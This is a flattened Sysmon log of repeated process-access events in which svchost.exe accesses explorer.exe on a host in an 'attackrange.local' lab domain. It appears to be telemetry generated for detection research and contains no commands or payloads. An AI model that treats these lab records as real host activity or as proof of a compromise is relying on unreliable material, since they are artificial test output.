16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 